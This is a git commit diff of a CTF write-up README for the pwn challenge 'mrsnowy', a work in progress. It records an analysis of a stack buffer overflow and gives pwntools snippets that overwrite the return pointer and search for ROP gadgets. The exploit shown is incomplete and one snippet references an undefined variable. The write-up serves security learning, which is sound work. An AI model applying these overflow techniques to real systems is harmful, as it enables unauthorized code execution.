update

2021-12-06 15:00:31 +01:00
parent dfd1a6dd31
commit 9c7e6ec56b
1 changed files with 18 additions and 4 deletions
--- a/pwn/mrsnowy/README.md
+++ b/pwn/mrsnowy/README.md
@@ -8,14 +8,18 @@ Something must be wrong with him.

 ## Progress so far

- `read()` reads 0x108 bytes
- The Stackframe has a size of 0x40 bytes
+![vulnerable function](images/investigate.png)
+
+- The `read()` reads 0x108 bytes of input from stdin
+  - The buffer is uninitialized
+  - The functioncall sits at `*investigate+67`
+- The Stackframe of the function only has a size of 0x40 bytes
 - `checksec --file=mrsnowy` reports NX being enabled
  - So no shellcode will be placable unless there is executable space
  - This hints to ROP Chaining
 - The binary should be patched to get rid of the timetaking animation
-  - Just `nop` the banner() function call
- Overwriting the returnpointer of `investigate()`:
+  - Just `nop` the banner() function call using radare2
+- Overwriting the returnpointer of `investigate()` using pwntools:

 ```python
 context(arch='x86_64', os='linux')
@@ -23,6 +27,7 @@ context.terminal = ['/usr/bin/alacritty', '-e']
 e = ELF("mr_snowy")
 p = process(e.path)

+# read banner and stuff until input is requested
 def do_read():
  while True:
     ll = p.read()
@@ -41,3 +46,12 @@ p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
 # start the python debugger to get a coredump which is loadable by gdb
 ipdb.set_trace()
 ```
+
+- Trying to find ROP Gadgets using pwntools
+
+```python
+e = ELF("mr_snowy")
+rop = ROP(elf)
+rop.rbx
+rop.gadgets
+```